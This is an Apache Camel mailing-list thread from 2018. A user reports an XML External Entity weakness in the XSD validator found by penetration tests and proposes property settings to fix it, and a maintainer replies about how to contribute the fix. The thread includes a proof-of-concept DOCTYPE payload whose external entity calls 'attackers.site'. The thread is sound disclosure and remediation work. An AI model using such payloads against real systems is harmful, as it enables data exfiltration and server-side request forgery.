You are viewing a plain text version of this content. The canonical link for it is here.

Posted to users@camel.apache.org by Karel Jelínek <ka...@unicorn.com> on 2018/04/14 11:23:51 UTC

XML External Entity (XXE) - validator vulnerability ?

Dear All,
we are using XSD validation processor by camel-core library

...
.to("validator:classpath:xsd/exportenv70.xsd")
...

Our penetration tests found that application can be attacked by "XML 
External Entity (XXE)" 
(https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Validator)

We think that classes infected by this vulnerability are

org.apache.camel.processor.validation.SchemaReader.java
org.apache.camel.processor.validation.ValidatingProcessor.java

Method SchemaReader.createSchemaFactory should also set property 
"factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");"

Method ValidatingProcessor.doProcess should set property to validator class

Validator validator = schema.newValidator();
//prevent XXE attack
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

If we try to validate infected XML against XSD we can see that camel is 
trying to access external site (attackers.site) in this example

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://attackers.site:53/TEST">
%remote;
%run;
%trick;]>

Disabling mentioned properties should do the trick

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Validator


I would like to ask you if this will be created as a security BUG in 
camel and if it will be fixed in the future version?

Can we use some workaround? Write our custom implementation of 
ValidatingProcessor? Is it possible?

-- 

Best regards

Karel Jelínek
Unicorn Systems
https://unicorn.com/

Re: XML External Entity (XXE) - validator vulnerability ?

Posted by Willem Jiang <wi...@gmail.com>.

Hi Karel,

Normally we talk about this kind of issue in the private mailing list[1].
As you already provide a fix for it, you can send a PR [2] with the fix as
the contribution document[3] suggested. I'd happy to apply it into
camel-core.

I'm not sure how did you deploy the camel application. Normally you can
create a patch jar which just has the fixed classed and put it as the first
element in the class path to override the old version of Camel class.

[1]https://www.apache.org/security/#reporting-a-vulnerability
[2]https://github.com/apache/camel
[3]https://github.com/apache/camel/blob/master/CONTRIBUTING.md


Willem Jiang

Blog: http://willemjiang.blogspot.com (English)
          http://jnn.iteye.com  (Chinese)
Twitter: willemjiang
Weibo: 姜宁willem

On Sat, Apr 14, 2018 at 7:23 PM, Karel Jelínek <ka...@unicorn.com>
wrote:

> Dear All,
> we are using XSD validation processor by camel-core library
>
> ...
> .to("validator:classpath:xsd/exportenv70.xsd")
> ...
>
> Our penetration tests found that application can be attacked by "XML
> External Entity (XXE)" (https://www.owasp.org/index.p
> hp/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Validator)
>
> We think that classes infected by this vulnerability are
>
> org.apache.camel.processor.validation.SchemaReader.java
> org.apache.camel.processor.validation.ValidatingProcessor.java
>
> Method SchemaReader.createSchemaFactory should also set property
> "factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");"
>
> Method ValidatingProcessor.doProcess should set property to validator class
>
> Validator validator = schema.newValidator();
> //prevent XXE attack
> validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
> validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
>
> If we try to validate infected XML against XSD we can see that camel is
> trying to access external site (attackers.site) in this example
>
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE root [
> <!ENTITY % remote SYSTEM "http://attackers.site:53/TEST">
> %remote;
> %run;
> %trick;]>
>
> Disabling mentioned properties should do the trick
>
> https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Pr
> evention_Cheat_Sheet#Validator
>
>
> I would like to ask you if this will be created as a security BUG in camel
> and if it will be fixed in the future version?
>
> Can we use some workaround? Write our custom implementation of
> ValidatingProcessor? Is it possible?
>
> --
>
> Best regards
>
> Karel Jelínek
> Unicorn Systems
> https://unicorn.com/
>